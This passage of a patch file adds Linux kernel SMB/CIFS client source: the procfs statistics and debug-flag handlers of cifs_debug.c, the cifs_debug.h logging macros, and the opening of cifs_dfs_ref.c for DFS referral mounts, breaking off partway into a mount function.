++				}
++			}
++		}
++		spin_unlock(&cifs_tcp_ses_lock);
++	} else {
++		return rc;
++	}
++
++	return count;
++}
++
++static int cifs_stats_proc_show(struct seq_file *m, void *v)
++{
++	int i;
++#ifdef CONFIG_CIFS_STATS2
++	int j;
++#endif /* STATS2 */
++	struct TCP_Server_Info *server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++
++	seq_printf(m, "Resources in use\nCIFS Session: %d\n",
++			sesInfoAllocCount.counter);
++	seq_printf(m, "Share (unique mount targets): %d\n",
++			tconInfoAllocCount.counter);
++	seq_printf(m, "SMB Request/Response Buffer: %d Pool size: %d\n",
++			buf_alloc_count.counter,
++			cifs_min_rcv + tcpSesAllocCount.counter);
++	seq_printf(m, "SMB Small Req/Resp Buffer: %d Pool size: %d\n",
++			small_buf_alloc_count.counter, cifs_min_small);
++#ifdef CONFIG_CIFS_STATS2
++	seq_printf(m, "Total Large %d Small %d Allocations\n",
++				atomic_read(&total_buf_alloc_count),
++				atomic_read(&total_small_buf_alloc_count));
++#endif /* CONFIG_CIFS_STATS2 */
++
++	seq_printf(m, "Operations (MIDs): %d\n", atomic_read(&mid_count));
++	seq_printf(m,
++		"\n%d session %d share reconnects\n",
++		tcpSesReconnectCount.counter, tconInfoReconnectCount.counter);
++
++	seq_printf(m,
++		"Total vfs operations: %d maximum at one time: %d\n",
++		GlobalCurrentXid, GlobalMaxActiveXid);
++
++	i = 0;
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++		seq_printf(m, "\nMax requests in flight: %d", server->max_in_flight);
++#ifdef CONFIG_CIFS_STATS2
++		seq_puts(m, "\nTotal time spent processing by command. Time ");
++		seq_printf(m, "units are jiffies (%d per second)\n", HZ);
++		seq_puts(m, "  SMB3 CMD\tNumber\tTotal Time\tFastest\tSlowest\n");
++		seq_puts(m, "  --------\t------\t----------\t-------\t-------\n");
++		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
++			seq_printf(m, "  %d\t\t%d\t%llu\t\t%u\t%u\n", j,
++				atomic_read(&server->num_cmds[j]),
++				server->time_per_cmd[j],
++				server->fastest_cmd[j],
++				server->slowest_cmd[j]);
++		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
++			if (atomic_read(&server->smb2slowcmd[j])) {
++				spin_lock(&server->srv_lock);
++				seq_printf(m, "  %d slow responses from %s for command %d\n",
++					atomic_read(&server->smb2slowcmd[j]),
++					server->hostname, j);
++				spin_unlock(&server->srv_lock);
++			}
++#endif /* STATS2 */
++		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++				i++;
++				seq_printf(m, "\n%d) %s", i, tcon->tree_name);
++				if (tcon->need_reconnect)
++					seq_puts(m, "\tDISCONNECTED ");
++				seq_printf(m, "\nSMBs: %d",
++					   atomic_read(&tcon->num_smbs_sent));
++				if (server->ops->print_stats)
++					server->ops->print_stats(m, tcon);
++			}
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	seq_putc(m, '\n');
++	return 0;
++}
++
++static int cifs_stats_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifs_stats_proc_show, NULL);
++}
++
++static const struct proc_ops cifs_stats_proc_ops = {
++	.proc_open	= cifs_stats_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= cifs_stats_proc_write,
++};
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++#define PROC_FILE_DEFINE(name) \
++static ssize_t name##_write(struct file *file, const char __user *buffer, \
++	size_t count, loff_t *ppos) \
++{ \
++	int rc; \
++	rc = kstrtoint_from_user(buffer, count, 10, & name); \
++	if (rc) \
++		return rc; \
++	return count; \
++} \
++static int name##_proc_show(struct seq_file *m, void *v) \
++{ \
++	seq_printf(m, "%d\n", name ); \
++	return 0; \
++} \
++static int name##_open(struct inode *inode, struct file *file) \
++{ \
++	return single_open(file, name##_proc_show, NULL); \
++} \
++\
++static const struct proc_ops cifs_##name##_proc_fops = { \
++	.proc_open	= name##_open, \
++	.proc_read	= seq_read, \
++	.proc_lseek	= seq_lseek, \
++	.proc_release	= single_release, \
++	.proc_write	= name##_write, \
++}
++
++PROC_FILE_DEFINE(rdma_readwrite_threshold);
++PROC_FILE_DEFINE(smbd_max_frmr_depth);
++PROC_FILE_DEFINE(smbd_keep_alive_interval);
++PROC_FILE_DEFINE(smbd_max_receive_size);
++PROC_FILE_DEFINE(smbd_max_fragmented_recv_size);
++PROC_FILE_DEFINE(smbd_max_send_size);
++PROC_FILE_DEFINE(smbd_send_credit_target);
++PROC_FILE_DEFINE(smbd_receive_credit_max);
++#endif
++
++static struct proc_dir_entry *proc_fs_cifs;
++static const struct proc_ops cifsFYI_proc_ops;
++static const struct proc_ops cifs_lookup_cache_proc_ops;
++static const struct proc_ops traceSMB_proc_ops;
++static const struct proc_ops cifs_security_flags_proc_ops;
++static const struct proc_ops cifs_linux_ext_proc_ops;
++static const struct proc_ops cifs_mount_params_proc_ops;
++
++void
++cifs_proc_init(void)
++{
++	proc_fs_cifs = proc_mkdir("fs/cifs", NULL);
++	if (proc_fs_cifs == NULL)
++		return;
++
++	proc_create_single("DebugData", 0, proc_fs_cifs,
++			cifs_debug_data_proc_show);
++
++	proc_create_single("open_files", 0400, proc_fs_cifs,
++			cifs_debug_files_proc_show);
++
++	proc_create("Stats", 0644, proc_fs_cifs, &cifs_stats_proc_ops);
++	proc_create("cifsFYI", 0644, proc_fs_cifs, &cifsFYI_proc_ops);
++	proc_create("traceSMB", 0644, proc_fs_cifs, &traceSMB_proc_ops);
++	proc_create("LinuxExtensionsEnabled", 0644, proc_fs_cifs,
++		    &cifs_linux_ext_proc_ops);
++	proc_create("SecurityFlags", 0644, proc_fs_cifs,
++		    &cifs_security_flags_proc_ops);
++	proc_create("LookupCacheEnabled", 0644, proc_fs_cifs,
++		    &cifs_lookup_cache_proc_ops);
++
++	proc_create("mount_params", 0444, proc_fs_cifs, &cifs_mount_params_proc_ops);
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	proc_create("dfscache", 0644, proc_fs_cifs, &dfscache_proc_ops);
++#endif
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	proc_create("rdma_readwrite_threshold", 0644, proc_fs_cifs,
++		&cifs_rdma_readwrite_threshold_proc_fops);
++	proc_create("smbd_max_frmr_depth", 0644, proc_fs_cifs,
++		&cifs_smbd_max_frmr_depth_proc_fops);
++	proc_create("smbd_keep_alive_interval", 0644, proc_fs_cifs,
++		&cifs_smbd_keep_alive_interval_proc_fops);
++	proc_create("smbd_max_receive_size", 0644, proc_fs_cifs,
++		&cifs_smbd_max_receive_size_proc_fops);
++	proc_create("smbd_max_fragmented_recv_size", 0644, proc_fs_cifs,
++		&cifs_smbd_max_fragmented_recv_size_proc_fops);
++	proc_create("smbd_max_send_size", 0644, proc_fs_cifs,
++		&cifs_smbd_max_send_size_proc_fops);
++	proc_create("smbd_send_credit_target", 0644, proc_fs_cifs,
++		&cifs_smbd_send_credit_target_proc_fops);
++	proc_create("smbd_receive_credit_max", 0644, proc_fs_cifs,
++		&cifs_smbd_receive_credit_max_proc_fops);
++#endif
++}
++
++void
++cifs_proc_clean(void)
++{
++	if (proc_fs_cifs == NULL)
++		return;
++
++	remove_proc_entry("DebugData", proc_fs_cifs);
++	remove_proc_entry("open_files", proc_fs_cifs);
++	remove_proc_entry("cifsFYI", proc_fs_cifs);
++	remove_proc_entry("traceSMB", proc_fs_cifs);
++	remove_proc_entry("Stats", proc_fs_cifs);
++	remove_proc_entry("SecurityFlags", proc_fs_cifs);
++	remove_proc_entry("LinuxExtensionsEnabled", proc_fs_cifs);
++	remove_proc_entry("LookupCacheEnabled", proc_fs_cifs);
++	remove_proc_entry("mount_params", proc_fs_cifs);
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	remove_proc_entry("dfscache", proc_fs_cifs);
++#endif
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	remove_proc_entry("rdma_readwrite_threshold", proc_fs_cifs);
++	remove_proc_entry("smbd_max_frmr_depth", proc_fs_cifs);
++	remove_proc_entry("smbd_keep_alive_interval", proc_fs_cifs);
++	remove_proc_entry("smbd_max_receive_size", proc_fs_cifs);
++	remove_proc_entry("smbd_max_fragmented_recv_size", proc_fs_cifs);
++	remove_proc_entry("smbd_max_send_size", proc_fs_cifs);
++	remove_proc_entry("smbd_send_credit_target", proc_fs_cifs);
++	remove_proc_entry("smbd_receive_credit_max", proc_fs_cifs);
++#endif
++	remove_proc_entry("fs/cifs", NULL);
++}
++
++static int cifsFYI_proc_show(struct seq_file *m, void *v)
++{
++	seq_printf(m, "%d\n", cifsFYI);
++	return 0;
++}
++
++static int cifsFYI_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifsFYI_proc_show, NULL);
++}
++
++static ssize_t cifsFYI_proc_write(struct file *file, const char __user *buffer,
++		size_t count, loff_t *ppos)
++{
++	char c[2] = { '\0' };
++	bool bv;
++	int rc;
++
++	rc = get_user(c[0], buffer);
++	if (rc)
++		return rc;
++	if (strtobool(c, &bv) == 0)
++		cifsFYI = bv;
++	else if ((c[0] > '1') && (c[0] <= '9'))
++		cifsFYI = (int) (c[0] - '0'); /* see cifs_debug.h for meanings */
++	else
++		return -EINVAL;
++
++	return count;
++}
++
++static const struct proc_ops cifsFYI_proc_ops = {
++	.proc_open	= cifsFYI_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= cifsFYI_proc_write,
++};
++
++static int cifs_linux_ext_proc_show(struct seq_file *m, void *v)
++{
++	seq_printf(m, "%d\n", linuxExtEnabled);
++	return 0;
++}
++
++static int cifs_linux_ext_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifs_linux_ext_proc_show, NULL);
++}
++
++static ssize_t cifs_linux_ext_proc_write(struct file *file,
++		const char __user *buffer, size_t count, loff_t *ppos)
++{
++	int rc;
++
++	rc = kstrtobool_from_user(buffer, count, &linuxExtEnabled);
++	if (rc)
++		return rc;
++
++	return count;
++}
++
++static const struct proc_ops cifs_linux_ext_proc_ops = {
++	.proc_open	= cifs_linux_ext_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= cifs_linux_ext_proc_write,
++};
++
++static int cifs_lookup_cache_proc_show(struct seq_file *m, void *v)
++{
++	seq_printf(m, "%d\n", lookupCacheEnabled);
++	return 0;
++}
++
++static int cifs_lookup_cache_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifs_lookup_cache_proc_show, NULL);
++}
++
++static ssize_t cifs_lookup_cache_proc_write(struct file *file,
++		const char __user *buffer, size_t count, loff_t *ppos)
++{
++	int rc;
++
++	rc = kstrtobool_from_user(buffer, count, &lookupCacheEnabled);
++	if (rc)
++		return rc;
++
++	return count;
++}
++
++static const struct proc_ops cifs_lookup_cache_proc_ops = {
++	.proc_open	= cifs_lookup_cache_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= cifs_lookup_cache_proc_write,
++};
++
++static int traceSMB_proc_show(struct seq_file *m, void *v)
++{
++	seq_printf(m, "%d\n", traceSMB);
++	return 0;
++}
++
++static int traceSMB_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, traceSMB_proc_show, NULL);
++}
++
++static ssize_t traceSMB_proc_write(struct file *file, const char __user *buffer,
++		size_t count, loff_t *ppos)
++{
++	int rc;
++
++	rc = kstrtobool_from_user(buffer, count, &traceSMB);
++	if (rc)
++		return rc;
++
++	return count;
++}
++
++static const struct proc_ops traceSMB_proc_ops = {
++	.proc_open	= traceSMB_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= traceSMB_proc_write,
++};
++
++static int cifs_security_flags_proc_show(struct seq_file *m, void *v)
++{
++	seq_printf(m, "0x%x\n", global_secflags);
++	return 0;
++}
++
++static int cifs_security_flags_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifs_security_flags_proc_show, NULL);
++}
++
++/*
++ * Ensure that if someone sets a MUST flag, that we disable all other MAY
++ * flags except for the ones corresponding to the given MUST flag. If there are
++ * multiple MUST flags, then try to prefer more secure ones.
++ */
++static void
++cifs_security_flags_handle_must_flags(unsigned int *flags)
++{
++	unsigned int signflags = *flags & CIFSSEC_MUST_SIGN;
++
++	if ((*flags & CIFSSEC_MUST_KRB5) == CIFSSEC_MUST_KRB5)
++		*flags = CIFSSEC_MUST_KRB5;
++	else if ((*flags & CIFSSEC_MUST_NTLMSSP) == CIFSSEC_MUST_NTLMSSP)
++		*flags = CIFSSEC_MUST_NTLMSSP;
++	else if ((*flags & CIFSSEC_MUST_NTLMV2) == CIFSSEC_MUST_NTLMV2)
++		*flags = CIFSSEC_MUST_NTLMV2;
++
++	*flags |= signflags;
++}
++
++static ssize_t cifs_security_flags_proc_write(struct file *file,
++		const char __user *buffer, size_t count, loff_t *ppos)
++{
++	int rc;
++	unsigned int flags;
++	char flags_string[12];
++	bool bv;
++
++	if ((count < 1) || (count > 11))
++		return -EINVAL;
++
++	memset(flags_string, 0, 12);
++
++	if (copy_from_user(flags_string, buffer, count))
++		return -EFAULT;
++
++	if (count < 3) {
++		/* single char or single char followed by null */
++		if (strtobool(flags_string, &bv) == 0) {
++			global_secflags = bv ? CIFSSEC_MAX : CIFSSEC_DEF;
++			return count;
++		} else if (!isdigit(flags_string[0])) {
++			cifs_dbg(VFS, "Invalid SecurityFlags: %s\n",
++					flags_string);
++			return -EINVAL;
++		}
++	}
++
++	/* else we have a number */
++	rc = kstrtouint(flags_string, 0, &flags);
++	if (rc) {
++		cifs_dbg(VFS, "Invalid SecurityFlags: %s\n",
++				flags_string);
++		return rc;
++	}
++
++	cifs_dbg(FYI, "sec flags 0x%x\n", flags);
++
++	if (flags == 0)  {
++		cifs_dbg(VFS, "Invalid SecurityFlags: %s\n", flags_string);
++		return -EINVAL;
++	}
++
++	if (flags & ~CIFSSEC_MASK) {
++		cifs_dbg(VFS, "Unsupported security flags: 0x%x\n",
++			 flags & ~CIFSSEC_MASK);
++		return -EINVAL;
++	}
++
++	cifs_security_flags_handle_must_flags(&flags);
++
++	/* flags look ok - update the global security flags for cifs module */
++	global_secflags = flags;
++	if (global_secflags & CIFSSEC_MUST_SIGN) {
++		/* requiring signing implies signing is allowed */
++		global_secflags |= CIFSSEC_MAY_SIGN;
++		cifs_dbg(FYI, "packet signing now required\n");
++	} else if ((global_secflags & CIFSSEC_MAY_SIGN) == 0) {
++		cifs_dbg(FYI, "packet signing disabled\n");
++	}
++	/* BB should we turn on MAY flags for other MUST options? */
++	return count;
++}
++
++static const struct proc_ops cifs_security_flags_proc_ops = {
++	.proc_open	= cifs_security_flags_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= cifs_security_flags_proc_write,
++};
++
++/* To make it easier to debug, can help to show mount params */
++static int cifs_mount_params_proc_show(struct seq_file *m, void *v)
++{
++	const struct fs_parameter_spec *p;
++	const char *type;
++
++	for (p = smb3_fs_parameters; p->name; p++) {
++		/* cannot use switch with pointers... */
++		if (!p->type) {
++			if (p->flags == fs_param_neg_with_no)
++				type = "noflag";
++			else
++				type = "flag";
++		} else if (p->type == fs_param_is_bool)
++			type = "bool";
++		else if (p->type == fs_param_is_u32)
++			type = "u32";
++		else if (p->type == fs_param_is_u64)
++			type = "u64";
++		else if (p->type == fs_param_is_string)
++			type = "string";
++		else
++			type = "unknown";
++
++		seq_printf(m, "%s:%s\n", p->name, type);
++	}
++
++	return 0;
++}
++
++static int cifs_mount_params_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifs_mount_params_proc_show, NULL);
++}
++
++static const struct proc_ops cifs_mount_params_proc_ops = {
++	.proc_open	= cifs_mount_params_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	/* No need for write for now */
++	/* .proc_write	= cifs_mount_params_proc_write, */
++};
++
++#else
++inline void cifs_proc_init(void)
++{
++}
++
++inline void cifs_proc_clean(void)
++{
++}
++#endif /* PROC_FS */
+diff --git a/fs/smb/client/cifs_debug.h b/fs/smb/client/cifs_debug.h
+new file mode 100644
+index 0000000000000..ce5cfd236fdb8
+--- /dev/null
++++ b/fs/smb/client/cifs_debug.h
+@@ -0,0 +1,160 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2000,2002
++ *   Modified by Steve French (sfrench@us.ibm.com)
++ */
++
++#ifndef _H_CIFS_DEBUG
++#define _H_CIFS_DEBUG
++
++#ifdef pr_fmt
++#undef pr_fmt
++#endif
++
++#define pr_fmt(fmt) "CIFS: " fmt
++
++void cifs_dump_mem(char *label, void *data, int length);
++void cifs_dump_detail(void *buf, struct TCP_Server_Info *ptcp_info);
++void cifs_dump_mids(struct TCP_Server_Info *);
++extern bool traceSMB;		/* flag which enables the function below */
++void dump_smb(void *, int);
++#define CIFS_INFO	0x01
++#define CIFS_RC		0x02
++#define CIFS_TIMER	0x04
++
++#define VFS 1
++#define FYI 2
++extern int cifsFYI;
++#ifdef CONFIG_CIFS_DEBUG2
++#define NOISY 4
++#else
++#define NOISY 0
++#endif
++#define ONCE 8
++
++/*
++ *	debug ON
++ *	--------
++ */
++#ifdef CONFIG_CIFS_DEBUG
++
++
++/*
++ * When adding tracepoints and debug messages we have various choices.
++ * Some considerations:
++ *
++ * Use cifs_dbg(VFS, ...) for things we always want logged, and the user to see
++ *     cifs_info(...) slightly less important, admin can filter via loglevel > 6
++ *     cifs_dbg(FYI, ...) minor debugging messages, off by default
++ *     trace_smb3_*  ftrace functions are preferred for complex debug messages
++ *                 intended for developers or experienced admins, off by default
++ */
++
++/* Information level messages, minor events */
++#define cifs_info_func(ratefunc, fmt, ...)				\
++	pr_info_ ## ratefunc(fmt, ##__VA_ARGS__)
++
++#define cifs_info(fmt, ...)						\
++	cifs_info_func(ratelimited, fmt, ##__VA_ARGS__)
++
++/* information message: e.g., configuration, major event */
++#define cifs_dbg_func(ratefunc, type, fmt, ...)				\
++do {									\
++	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
++		pr_debug_ ## ratefunc("%s: " fmt,			\
++				      __FILE__, ##__VA_ARGS__);		\
++	} else if ((type) & VFS) {					\
++		pr_err_ ## ratefunc("VFS: " fmt, ##__VA_ARGS__);	\
++	} else if ((type) & NOISY && (NOISY != 0)) {			\
++		pr_debug_ ## ratefunc(fmt, ##__VA_ARGS__);		\
++	}								\
++} while (0)
++
++#define cifs_dbg(type, fmt, ...)					\
++do {									\
++	if ((type) & ONCE)						\
++		cifs_dbg_func(once, type, fmt, ##__VA_ARGS__);		\
++	else								\
++		cifs_dbg_func(ratelimited, type, fmt, ##__VA_ARGS__);	\
++} while (0)
++
++#define cifs_server_dbg_func(ratefunc, type, fmt, ...)			\
++do {									\
++	spin_lock(&server->srv_lock);					\
++	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
++		pr_debug_ ## ratefunc("%s: \\\\%s " fmt,		\
++				      __FILE__, server->hostname,	\
++				      ##__VA_ARGS__);			\
++	} else if ((type) & VFS) {					\
++		pr_err_ ## ratefunc("VFS: \\\\%s " fmt,			\
++				    server->hostname, ##__VA_ARGS__);	\
++	} else if ((type) & NOISY && (NOISY != 0)) {			\
++		pr_debug_ ## ratefunc("\\\\%s " fmt,			\
++				      server->hostname, ##__VA_ARGS__);	\
++	}								\
++	spin_unlock(&server->srv_lock);					\
++} while (0)
++
++#define cifs_server_dbg(type, fmt, ...)					\
++do {									\
++	if ((type) & ONCE)						\
++		cifs_server_dbg_func(once, type, fmt, ##__VA_ARGS__);	\
++	else								\
++		cifs_server_dbg_func(ratelimited, type, fmt,		\
++				     ##__VA_ARGS__);			\
++} while (0)
++
++#define cifs_tcon_dbg_func(ratefunc, type, fmt, ...)			\
++do {									\
++	const char *tn = "";						\
++	if (tcon && tcon->tree_name)					\
++		tn = tcon->tree_name;					\
++	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
++		pr_debug_ ## ratefunc("%s: %s "	fmt,			\
++				      __FILE__, tn, ##__VA_ARGS__);	\
++	} else if ((type) & VFS) {					\
++		pr_err_ ## ratefunc("VFS: %s " fmt, tn, ##__VA_ARGS__);	\
++	} else if ((type) & NOISY && (NOISY != 0)) {			\
++		pr_debug_ ## ratefunc("%s " fmt, tn, ##__VA_ARGS__);	\
++	}								\
++} while (0)
++
++#define cifs_tcon_dbg(type, fmt, ...)					\
++do {									\
++	if ((type) & ONCE)						\
++		cifs_tcon_dbg_func(once, type, fmt, ##__VA_ARGS__);	\
++	else								\
++		cifs_tcon_dbg_func(ratelimited, type, fmt,		\
++				   ##__VA_ARGS__);			\
++} while (0)
++
++/*
++ *	debug OFF
++ *	---------
++ */
++#else		/* _CIFS_DEBUG */
++#define cifs_dbg(type, fmt, ...)					\
++do {									\
++	if (0)								\
++		pr_debug(fmt, ##__VA_ARGS__);				\
++} while (0)
++
++#define cifs_server_dbg(type, fmt, ...)					\
++do {									\
++	if (0)								\
++		pr_debug("\\\\%s " fmt,					\
++			 server->hostname, ##__VA_ARGS__);		\
++} while (0)
++
++#define cifs_tcon_dbg(type, fmt, ...)					\
++do {									\
++	if (0)								\
++		pr_debug("%s " fmt, tcon->tree_name, ##__VA_ARGS__);	\
++} while (0)
++
++#define cifs_info(fmt, ...)						\
++	pr_info(fmt, ##__VA_ARGS__)
++#endif
++
++#endif				/* _H_CIFS_DEBUG */
+diff --git a/fs/smb/client/cifs_dfs_ref.c b/fs/smb/client/cifs_dfs_ref.c
+new file mode 100644
+index 0000000000000..b0864da9ef434
+--- /dev/null
++++ b/fs/smb/client/cifs_dfs_ref.c
+@@ -0,0 +1,374 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Contains the CIFS DFS referral mounting routines used for handling
++ *   traversal via DFS junction point
++ *
++ *   Copyright (c) 2007 Igor Mammedov
++ *   Copyright (C) International Business Machines  Corp., 2008
++ *   Author(s): Igor Mammedov (niallain@gmail.com)
++ *		Steve French (sfrench@us.ibm.com)
++ */
++
++#include <linux/dcache.h>
++#include <linux/mount.h>
++#include <linux/namei.h>
++#include <linux/slab.h>
++#include <linux/vfs.h>
++#include <linux/fs.h>
++#include <linux/inet.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifsfs.h"
++#include "dns_resolve.h"
++#include "cifs_debug.h"
++#include "cifs_unicode.h"
++#include "dfs_cache.h"
++#include "fs_context.h"
++
++static LIST_HEAD(cifs_dfs_automount_list);
++
++static void cifs_dfs_expire_automounts(struct work_struct *work);
++static DECLARE_DELAYED_WORK(cifs_dfs_automount_task,
++			    cifs_dfs_expire_automounts);
++static int cifs_dfs_mountpoint_expiry_timeout = 500 * HZ;
++
++static void cifs_dfs_expire_automounts(struct work_struct *work)
++{
++	struct list_head *list = &cifs_dfs_automount_list;
++
++	mark_mounts_for_expiry(list);
++	if (!list_empty(list))
++		schedule_delayed_work(&cifs_dfs_automount_task,
++				      cifs_dfs_mountpoint_expiry_timeout);
++}
++
++void cifs_dfs_release_automount_timer(void)
++{
++	BUG_ON(!list_empty(&cifs_dfs_automount_list));
++	cancel_delayed_work_sync(&cifs_dfs_automount_task);
++}
++
++/**
++ * cifs_build_devname - build a devicename from a UNC and optional prepath
++ * @nodename:	pointer to UNC string
++ * @prepath:	pointer to prefixpath (or NULL if there isn't one)
++ *
++ * Build a new cifs devicename after chasing a DFS referral. Allocate a buffer
++ * big enough to hold the final thing. Copy the UNC from the nodename, and
++ * concatenate the prepath onto the end of it if there is one.
++ *
++ * Returns pointer to the built string, or a ERR_PTR. Caller is responsible
++ * for freeing the returned string.
++ */
++static char *
++cifs_build_devname(char *nodename, const char *prepath)
++{
++	size_t pplen;
++	size_t unclen;
++	char *dev;
++	char *pos;
++
++	/* skip over any preceding delimiters */
++	nodename += strspn(nodename, "\\");
++	if (!*nodename)
++		return ERR_PTR(-EINVAL);
++
++	/* get length of UNC and set pos to last char */
++	unclen = strlen(nodename);
++	pos = nodename + unclen - 1;
++
++	/* trim off any trailing delimiters */
++	while (*pos == '\\') {
++		--pos;
++		--unclen;
++	}
++
++	/* allocate a buffer:
++	 * +2 for preceding "//"
++	 * +1 for delimiter between UNC and prepath
++	 * +1 for trailing NULL
++	 */
++	pplen = prepath ? strlen(prepath) : 0;
++	dev = kmalloc(2 + unclen + 1 + pplen + 1, GFP_KERNEL);
++	if (!dev)
++		return ERR_PTR(-ENOMEM);
++
++	pos = dev;
++	/* add the initial "//" */
++	*pos = '/';
++	++pos;
++	*pos = '/';
++	++pos;
++
++	/* copy in the UNC portion from referral */
++	memcpy(pos, nodename, unclen);
++	pos += unclen;
++
++	/* copy the prefixpath remainder (if there is one) */
++	if (pplen) {
++		*pos = '/';
++		++pos;
++		memcpy(pos, prepath, pplen);
++		pos += pplen;
++	}
++
++	/* NULL terminator */
++	*pos = '\0';
++
++	convert_delimiter(dev, '/');
++	return dev;
++}
++
++
++/**
++ * cifs_compose_mount_options	-	creates mount options for referral
++ * @sb_mountdata:	parent/root DFS mount options (template)
++ * @fullpath:		full path in UNC format
++ * @ref:		optional server's referral
++ * @devname:		return the built cifs device name if passed pointer not NULL
++ * creates mount options for submount based on template options sb_mountdata
++ * and replacing unc,ip,prefixpath options with ones we've got form ref_unc.
++ *
++ * Returns: pointer to new mount options or ERR_PTR.
++ * Caller is responsible for freeing returned value if it is not error.
++ */
++char *cifs_compose_mount_options(const char *sb_mountdata,
++				 const char *fullpath,
++				 const struct dfs_info3_param *ref,
++				 char **devname)
++{
++	int rc;
++	char *name;
++	char *mountdata = NULL;
++	const char *prepath = NULL;
++	int md_len;
++	char *tkn_e;
++	char *srvIP = NULL;
++	char sep = ',';
++	int off, noff;
++
++	if (sb_mountdata == NULL)
++		return ERR_PTR(-EINVAL);
++
++	if (ref) {
++		if (WARN_ON_ONCE(!ref->node_name || ref->path_consumed < 0))
++			return ERR_PTR(-EINVAL);
++
++		if (strlen(fullpath) - ref->path_consumed) {
++			prepath = fullpath + ref->path_consumed;
++			/* skip initial delimiter */
++			if (*prepath == '/' || *prepath == '\\')
++				prepath++;
++		}
++
++		name = cifs_build_devname(ref->node_name, prepath);
++		if (IS_ERR(name)) {
++			rc = PTR_ERR(name);
++			name = NULL;
++			goto compose_mount_options_err;
++		}
++	} else {
++		name = cifs_build_devname((char *)fullpath, NULL);
++		if (IS_ERR(name)) {
++			rc = PTR_ERR(name);
++			name = NULL;
++			goto compose_mount_options_err;
++		}
++	}
++
++	rc = dns_resolve_server_name_to_ip(name, &srvIP, NULL);
++	if (rc < 0) {
++		cifs_dbg(FYI, "%s: Failed to resolve server part of %s to IP: %d\n",
++			 __func__, name, rc);
++		goto compose_mount_options_err;
++	}
++
++	/*
++	 * In most cases, we'll be building a shorter string than the original,
++	 * but we do have to assume that the address in the ip= option may be
++	 * much longer than the original. Add the max length of an address
++	 * string to the length of the original string to allow for worst case.
++	 */
++	md_len = strlen(sb_mountdata) + INET6_ADDRSTRLEN;
++	mountdata = kzalloc(md_len + sizeof("ip=") + 1, GFP_KERNEL);
++	if (mountdata == NULL) {
++		rc = -ENOMEM;
++		goto compose_mount_options_err;
++	}
++
++	/* copy all options except of unc,ip,prefixpath */
++	off = 0;
++	if (strncmp(sb_mountdata, "sep=", 4) == 0) {
++			sep = sb_mountdata[4];
++			strncpy(mountdata, sb_mountdata, 5);
++			off += 5;
++	}
++
++	do {
++		tkn_e = strchr(sb_mountdata + off, sep);
++		if (tkn_e == NULL)
++			noff = strlen(sb_mountdata + off);
++		else
++			noff = tkn_e - (sb_mountdata + off) + 1;
++
++		if (strncasecmp(sb_mountdata + off, "cruid=", 6) == 0) {
++			off += noff;
++			continue;
++		}
++		if (strncasecmp(sb_mountdata + off, "unc=", 4) == 0) {
++			off += noff;
++			continue;
++		}
++		if (strncasecmp(sb_mountdata + off, "ip=", 3) == 0) {
++			off += noff;
++			continue;
++		}
++		if (strncasecmp(sb_mountdata + off, "prefixpath=", 11) == 0) {
++			off += noff;
++			continue;
++		}
++		strncat(mountdata, sb_mountdata + off, noff);
++		off += noff;
++	} while (tkn_e);
++	strcat(mountdata, sb_mountdata + off);
++	mountdata[md_len] = '\0';
++
++	/* copy new IP and ref share name */
++	if (mountdata[strlen(mountdata) - 1] != sep)
++		strncat(mountdata, &sep, 1);
++	strcat(mountdata, "ip=");
++	strcat(mountdata, srvIP);
++
++	if (devname)
++		*devname = name;
++	else
++		kfree(name);
++
++	/*cifs_dbg(FYI, "%s: parent mountdata: %s\n", __func__, sb_mountdata);*/
++	/*cifs_dbg(FYI, "%s: submount mountdata: %s\n", __func__, mountdata );*/
++
++compose_mount_options_out:
++	kfree(srvIP);
++	return mountdata;
++
++compose_mount_options_err:
++	kfree(mountdata);
++	mountdata = ERR_PTR(rc);
++	kfree(name);
++	goto compose_mount_options_out;
++}
++
++/**
++ * cifs_dfs_do_mount - mounts specified path using DFS full path
++ *
++ * Always pass down @fullpath to smb3_do_mount() so we can use the root server
++ * to perform failover in case we failed to connect to the first target in the
++ * referral.
++ *
++ * @mntpt:		directory entry for the path we are trying to automount
++ * @cifs_sb:		parent/root superblock
++ * @fullpath:		full path in UNC format
++ */
++static struct vfsmount *cifs_dfs_do_mount(struct dentry *mntpt,
